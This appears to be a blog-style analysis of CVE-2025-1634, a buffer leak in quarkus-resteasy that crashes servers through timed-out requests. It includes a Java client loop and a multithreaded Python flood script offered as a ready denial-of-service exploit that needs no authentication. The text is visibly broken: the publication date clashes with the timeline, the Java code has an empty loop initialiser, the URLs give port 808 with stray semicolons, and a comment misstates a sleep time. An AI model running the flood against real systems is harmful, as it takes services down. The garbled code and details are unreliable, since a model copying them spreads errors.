CVE-2025-1634 - Memory Leak in quarkus-resteasy Leads to OutOfMemoryError — Detailed Analysis & Exploit Guide

Published: June 2024
Severity: High

Introduction

A critical vulnerability labeled CVE-2025-1634 was discovered in the popular Java framework extension quarkus-resteasy. This flaw can cause your application to consume all available memory and crash, simply by sending client requests with low timeouts. In this article, we’ll take a close look at how this bug works, show code illustrating the issue, and provide resources for patching.

What is CVE-2025-1634?

When your Quarkus application uses the RESTEasy extension to handle HTTP requests, it depends on internal buffers to manage the incoming and outgoing data. If a client makes requests with very short timeouts, and these time out before data is handled, an internal buffer is not freed correctly. Over time, these "orphaned" buffers accumulate, eating through your server's RAM.

Result?
Unbounded memory growth and, eventually, an OutOfMemoryError crash.

Request Times Out:

If the client disconnects or the server's response is delayed (by even a tiny bit), the client times out and cancels the request.

Here’s a sample REST resource using quarkus-resteasy

@Path("/hello")
public class HelloResource {
    @GET
    public String hello() throws InterruptedException {
        // Simulate a slow response
        Thread.sleep(500); // 5 seconds
        return "Hello World";
    }
}

Let’s simulate a client with a low timeout

import java.net.HttpURLConnection;
import java.net.URL;

public class TimeoutClient {
    public static void main(String[] args) throws Exception {
        for (int i = ; i < 10000; i++) {
            HttpURLConnection conn = (HttpURLConnection) new URL("http://localhost:808/hello";).openConnection();
            conn.setConnectTimeout(100); // 100 ms timeout
            conn.setReadTimeout(100);    // 100 ms timeout
            try {
                conn.getResponseCode();
            } catch (Exception e) {
                // Expected timeout
            } finally {
                conn.disconnect();
            }
        }
        System.out.println("Done sending requests");
    }
}

Exploiting the Vulnerability

Anyone—malicious or not—can bring down your server with a simple script.

Here’s a more robust (Python) script

import requests
import threading

def flood():
    for _ in range(500):
        try:
            requests.get(
                "http://localhost:808/hello";,
                timeout=.1
            )
        except:
            pass # Ignore exceptions

threads = []
for _ in range(20):
    t = threading.Thread(target=flood)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

Running this for a minute or two may cause your Quarkus server to crash with OutOfMemoryError. No authentication required.

The Root Cause (Based on Source)

If you examine the quarkus-resteasy codebase, you’ll find a buffer release is tied to normal completion flows. Timeout events fail to trigger the same cleanup logic.

Relevant pseudo-code snippet (simplified)

try {
    // Allocate buffer
    Buffer buf = allocate();
    doWork(buf);
    // Normal path: release buffer
    buf.release();
} catch (TimeoutException e) {
    // Oops! Buffer is NOT RELEASED here
    throw e;
}

Mitigation: Always release resources in a finally block!

Original References

- Quarkus Security Advisory for CVE-2025-1634
- Red Hat Security Tracker
- Quarkus RESTEasy Reference Guide
- GitHub Commit Fixing the Leak *(link may be placeholder until patch is public)*

Conclusion

CVE-2025-1634 is a significant issue for anyone deploying Java REST APIs on Quarkus. It can be abused easily and will crash your service with repeated timed-out requests.
Upgrade as soon as possible. Don’t let a trivial buffer leak take down your infrastructure!


*Stay secure! For the latest breaking security news, subscribe to Quarkus Blog.*

Timeline

Published on: 02/26/2025 17:15:22 UTC
Last modified on: 03/18/2025 09:19:30 UTC